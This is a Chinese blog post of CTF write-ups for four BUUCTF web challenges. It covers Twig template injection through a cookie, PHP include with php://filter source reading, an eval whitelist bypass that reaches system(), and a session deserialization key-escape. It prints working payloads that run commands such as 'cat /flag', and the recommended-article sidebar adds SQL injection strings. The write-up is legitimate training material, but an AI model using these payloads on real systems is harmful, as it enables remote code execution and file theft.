BUUCTF打卡

最新推荐文章于 2024-07-28 00:43:14 发布
最新推荐文章于 2024-07-28 00:43:14 发布
阅读量374 收藏
点赞数
分类专栏: 训练打卡
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leo8283/article/details/116155196
版权

[BJDCTF2020]Cookie is so stable

根据提示关注Cookie

在输入框里输入{{7*7}}  页面上回显49

cookie里多了user

但直接用burp重发却没有,因为cookie里没有user,要根据前面的发现自己添加注入

 

是Twig模板

https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

payloadCookie:   user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};

[BSidesCF 2020]Had a bad day

 

说明是include函数,并且会给参数添加.php后缀

明白一个小知识:

<?php
	echo "123 page";
	include('6/../flag'.'.php')
?>

flag.php和6.php在同一目录下,6/../flag这么读,是把6作为一个目录,而不存在6这个目录,../后跳转到和6同级的目录,再/flag即可读到文件(这里目录名任意adasd/../flag)

再尝试读取源码,用伪协议

不能加.php后缀

php://filter/convert.base64-encode/resource=index

<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
			</div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

          </div>
        </div>
      </main>
    </div>
    <script src="js/material.min.js"></script>
  </body>
</html>

include要包含woofers或meowers或index

先找flag在哪

?category=woofersaaaaa/../flag

源代码里有说明包含到这个文件了,flag.php在当前目录下,接下来要把这个文件flag.php源码读出来,用伪协议

由于include要包含woofers或meowers或index,可以

利用php://filter伪协议可以套一层协议读取flag.php

php://filter/convert.base64-encode/indexadadad/resource=flag

[CISCN 2019 初赛]Love Math

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
} 
php中可以把函数名通过字符串的方式传递给一个变量
$a='system';
$a('ls');

构造:?c=$_GET[a]($_GET[b])&a=system&b=tac /flag


base_convert(37907361743,10,36) => "hex2bin"
dechex(1598506324) => "5f474554"
$pi=hex2bin("5f474554") => $pi="_GET"   //hex2bin将一串16进制数转换为二进制字符串
($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs}  //{}可以代替[]payload:?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag

[安洵杯 2019]easy_serialize_php

https://www.cnblogs.com/h3zh1/p/12732336.html

f=phpinfo

d0g3_f1ag.php文件自动包含文件末尾,先读出这个文件

 

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

 代码中输出点:echo file_get_contents(base64_decode($userinfo['img']));

使$userinfo['img']=base64_encode('d0g3_f1ag.php')=ZDBnM19mMWFnLnBocA==

谁控制$userinfo['img']

extract($_POST);

      变量覆盖函数会将SESSION的键值对全部覆盖,无论前面有多少个,只传了一个的话,那SESSION里就只会有这一个键值对了

<?php
	$_SESSION["user"] = 'guest';
	$_SESSION['function'] = '123123';
	extract($_POST);
	var_dump($_SESSION);
?>

通过这个控制SESSION['img_path']

有这句话,我们不能设置GET的img_path,这样会将执行sha1重新赋值,但是我们可以执行第一个base64_encode('guest_img.png');

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

base64_encode('guest_img.png')

$serialize_info = filter(serialize($_SESSION));

这句话可以序列化SESSION为字符串,并杯filter过滤,关键就在于filter过滤为空,使得我们可以在字符串上做手脚

$_SESSION['img'] = base64_encode('guest_img.png')这个变量是必有的,

但之前我们还可以通过extract($_POST)再传变量,后面一起序列化加过滤处理。

filter将字符串中的值过滤为空利用到了serialize的特性:

原理:因为序列化吼的字符串是严格的,对应的格式不能错,比如s:4:"name",那s:4就必须有一个字符串长度是4的否则就往后要。

并且unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉。

所以传一个_SESSION[php]=

 

 

尝试构造:

<?php
	$_SESSION["flag"] = 'guest';
	$_SESSION['img_path'] = base64_encode('guest_img.png');
	$a = serialize($_SESSION);
	echo $a;
?>

a:2:{s:4:"flag";s:5:"guest";s:8:"img_path";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

目的是获取:

a:2:{s:4:"flag";s:5:"guest";s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}";  前面补一补构造一下             后面这里要被扔掉 s:8:"img_path";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

前面filter后

a:2:{s:4:"";s:5:"guest";s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}";

没成功,字符串格式串错了

再来

a:2:{s:8:"flagflag";s:5:"guest";s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}"; -->filter后

a:2:{s:8:"";s:5:"guest";s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}"; 

还是不行,应该要构造出刚好s:xx:"xxxxx";  s:1:1;  s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}";

先加一个s:1:1; 

a:2:{s:12:"flagflagflag";s:5:"guest";s:1:1;s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}"; -->filter后

a:2:{s:12:"";s:5:"guest";s:1:1;s:8:"img_path";s:20:"ZDBnM19mMWFnLnBocA==";}"; 

这样子反序列化回去就是,当然这种奇怪的那么多符号的字符串当然会报错,假如没有那些语法,那应该刚好对应

_SESSION["";s:5:"guest"] = "1";

_SESSION["img_path"] = "ZDBnM19mMWFnLnBocA==";

官方说法 键逃逸~

所以我们在extract($_POST)时 ,其实payload肯定有很多,找到规律后慢慢修改磨合,

POST内容:

_SESSION[flagflagflag]=gues";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

读取到了当前目录下d0g3_f1ag.php,新提示

源码里新提示,把

base64_encode(/d0g3_fllllllag)的base64值替换进去L2QwZzNfZmxsbGxsbGFn,刚好也是20位

再来一次即可拿到flag

 

 

L1Rain
关注
专栏目录
打卡日历显示
11-23
在IT行业中,日历功能是许多应用程序不可或缺的一部分,特别是对于管理日常任务、安排会议或记录打卡情况的应用。"打卡日历显示"这个标题暗示我们正在处理一个JavaScript脚本,它可能是一个用于创建交互式日历并支持...
【CTF】ctf中用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 3199
ctf中用到的php伪协议总结及例题
BUUCTF刷题记录
2301_78965658的博客
09-04 434
现在是暑假第四周,BUU现在是正在刷第三页。加油学,只要能不断超越过去的自己,就是最值得骄傲的事。
ctf.show 敏感信息泄漏20题
最新发布
m0_74412122的博客
07-28 684
是由于运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。6.在网址后面加上/www.zip,打开下载的压缩包,php文件说flag在txt中,实际上txt中并没有。9.vim意外退出会留下.swap备份文件,网站后+/index.php.swp得到flag。5.直接在网址后面加上/index.phps,出来一个文件,打开找到flag。4.在网址后面加上后缀/robots.txt访问,找到flag。7.直接在后面加/.git/得到flag。
BUUCTF 打卡 21/9/1 Many-Time-Pad
qq_52193383的博客
09-01 590
参考博客:[Pion1eer_blog](Many-Time-Pad 攻击 (ruanx.net)) 因为最近遇到一道一次一密的题目,故把所学的记下。 Many-Time-Pad攻击: 本文讨论的情况是利用简单异或实现的加密,且是一个密钥进行多轮加密。 假设加密的明文分别为M1 , M2 , … , Mi ,对应密文C1 , C2 , … , C3 , 密钥为K。 加密过程为 Ci = Mi ^ K。 根据异或的性质(相同为0,不同为1),我们可以将任意两个密文进行异或,将会得到不含有密钥的式子: Ci
BUUCTF 打卡1
qq_52193383的博客
08-19 244
由于后面的知识盲点太多了,就从头开始把之前不会的再做一遍。 1.RSA5 一大串数据,20次加密过程中的m、e相同。我以为是广播攻击,想着用剩余定理来解,自己编的脚本差劲,就用了书上的脚本。解出个’\x01‘。回头再看一下广播攻击的前提,加密指数e较低!!!e = 65537应该算大吧。于是只能将这20个n进行分解,在n5的时候解出了p、q。 import libnum,gmpy2 n = 22822039733049388110936778173014765663663303811791283234361
BUUCTF 每日打卡 2021-7-14
weixin_52446095的博客
07-14 656
引言 鸽了快两个月,假期继续刷BUU,可以的话继续cryptohack 四面八方 看题干也看不出来什么 给了一个txt文件 key1:security key2:information 密文啊这是,骚年加油:zhnjinhoopcfcuktlj 摸不着头脑 找wp,知道是没见过的四方密码 是一种对称加密,多表替换密码 找了一个靠谱的在线工具 然后把结果换成小写套上flag就行 [De1CTF2019]babyrsa 加密代码如下: import binascii from data import e1,
早起签到打卡
02-16
4.0版本已经上线。...2.优化打卡的个人中心。 3.打卡的防止恶意投诉功能, 截图进不去小程序功能 4.引流加强,首页和个人中心关注公众号功能 5.防刷功能优化。 3.0版本已经上线。购买即是新版。往下找到【*】这
模仿钉钉打卡
10-12
Android 学习使用AccessibilityService,用于监听手机屏幕发生变化,可以制作模仿钉钉打卡,微信抢红包,运行项目后记得在手机设置-高级设置-辅助功能中打开APP相应的服务
打卡demo php
11-30
这个应用的核心功能是为员工提供一个在线打卡平台,管理者可以通过收集的数据进行考勤统计与分析。 在这款应用中,PHP作为后端开发语言,它具有轻量级、高效、易学习的特点,广泛应用于Web开发。PHP可以处理用户...
打卡神器android
11-27
打卡神器android】是一款专为钉钉用户设计的自动化打卡工具,主要针对Android平台。它通过编程的方式,帮助用户在设定的时间自动完成考勤打卡,从而省去了手动操作的麻烦,尤其是在早晨困倦或者忙碌的时候,可以...
BUUCTF 打卡2
qq_52193383的博客
08-20 387
1.RSA4 题目给出了三组c和n,猜测是广播攻击。猜测e = 3。自己写的脚本有点不靠谱,就借用书上的。值得注意的是题目给出的c和n都是5进制数!!!(仔细点的话可以看出数据中没有出现>=5的数字) #广播攻击??? import gmpy2,libnum from Crypto.Util.number import long_to_bytes,bytes_to_long def broadcast_attack(data): def extended_gcd(a,b):
BUU刷题记录——5
weixin_43610673的博客
09-21 1597
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
php 查找变量名,使用preg_match查找所有PHP变量
weixin_28723109的博客
03-18 225
\$(.*?)[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*所以在你的情况下,我会尝试:\$([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)/*** Find all PHP Variables with preg_match** @link https://stackoverflow.com/a/19563063/367456...
Web解题2 信息泄露 ( CTFHub ) - ctf,2024年最新字节跳动+阿里+华为+腾讯等大厂网络安全面试题
2401_83947398的博客
04-14 848
└─$ls└─$└─$tree .svn.svn├── format│ ├── bf│ └── f2├── tmp├── wc.db└─$└─$发现flag。HG泄露解题过程同上一题。└─$使用utf-8编码来处理输入和输出。└─$ls -altotal 104上上条指令输出not found可能是下载不完全,还是生成了.hg文件的。
一、CTF-Web-信息泄露(记录CTF学习)
qq_27920699的博客
12-16 2956
个人CTF学习之路
NO.2-13
nigo134的博客
07-27 229
首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 7060
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
CTF学习(二)——信息泄露、密码口令、SQL注入、文件上传
学习记录
02-28 1184
一、信息泄露 1.1目录遍历 ①点开题目后依次点开各目录,遍历后发现flag文件得旗 1.2 PHPINFO ①在长篇文件中查找flag得旗 1.3备份文件下载 1.3.1 网站源码 ①由提示下载文件www.zip后得到一份flag文件 ②flag文件中无flag,访问该文件名得旗 1.3.2 bak文件 ①访问index.php.bak,通过HBuilder X打开文件得旗 1.3.3 vim缓存 ①访问.index.php.swp(注意.),保存文件 ②通过HBuilder X打开文
"深入理解人脸识别打卡项目实现技术
本项目着重介绍了人脸识别打卡项目的实现步骤和相关技术应用。首先,人脸识别技术作为计算机视觉领域的重要分支,具有广泛的应用前景。图像作为人类视觉的基础,是信息获取的重要来源,而图像技术则是当前人工智能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值